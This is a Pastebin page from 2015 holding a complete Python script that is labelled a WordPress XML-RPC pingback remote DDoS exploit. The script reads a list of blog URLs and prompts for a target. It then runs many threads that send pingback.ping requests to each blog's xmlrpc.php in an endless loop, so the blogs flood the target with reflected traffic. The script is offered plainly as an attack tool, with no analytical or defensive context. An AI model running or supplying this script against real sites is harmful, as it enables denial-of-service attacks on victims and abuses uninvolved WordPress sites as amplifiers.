API tools faq
paste
Advertisement
TP2K1

XMLRPC DDoS WordPress PingBack API Remote Exploit

TP2K1
Jul 23rd, 2015
1,652
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.38 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. import sys
  3. import socket
  4. import threading
  5. import time
  6. import os
  7. Lock = threading.Lock()
  8. def main():
  9. try:
  10. in_file = open("list.txt","r")
  11. except:
  12. raw_input('You need a list.txt file to work')
  13. sys.exit(0)
  14. os.system("title ...:: XMLRPC PingBack DDoS ::... ")
  15. print '-------------------------------------------------------------------------\n'
  16. print '\tXML-RPC PingBack API Remote DDoS'
  17. print '\tDate : 20/04/2014'
  18. print '\tTested on Windows 7 / Windows Server 2012 / FreeBSD 9.2'
  19. print '\tPython version coded by : Sikh887 \n'
  20. print '--------------------------------------------------------------------------\n\n '
  21. num_thread = input("Number of thread: ")
  22. url = raw_input("Target: ")
  23. for i in range(num_thread):
  24. try:
  25. in_line = in_file.readline()
  26. Thread1(url, i+1, in_line).start()
  27. in_line = in_line[:-1]
  28. except:
  29. pass
  30. time.sleep(3)
  31.  
  32.  
  33. class Thread1(threading.Thread):
  34. def __init__(self, url, number, blog):
  35. self.url = url
  36. self.number = number
  37. self.blog = blog
  38. threading.Thread.__init__(self)
  39.  
  40. def run(self):
  41. Lock.acquire()
  42. print 'Starting thread #%s'%self.number
  43. Lock.release()
  44. function_pingback = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>"%(self.url, self.blog)
  45. request_lenght = len(function_pingback)
  46. try:
  47. self.blog_cleaned = self.blog.split("?p=")[0]
  48. self.blog_cleaned1 = self.blog_cleaned.split("http://")[1].split("/")[0]
  49. except:
  50. sys.exit(0)
  51. request = "POST %s/xmlrpc.php HTTP/1.0\r\nHost: %s\r\nUser-Agent: Internal Wordpress RPC connection\r\nContent-Type: text/xml\r\nContent-Length: %s\r\n\n<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>\r\n\r\n"%(self.blog_cleaned, self.blog_cleaned1, request_lenght, self.url, self.blog)
  52. while True:
  53. time.sleep(3)
  54. try:
  55. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
  56. s.connect((self.blog_cleaned1, 80))
  57. s.send(request)
  58. print"Thread %s | Blog %s"%(self.number, self.blog_cleaned1)
  59. except:
  60. ok = 0
  61. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!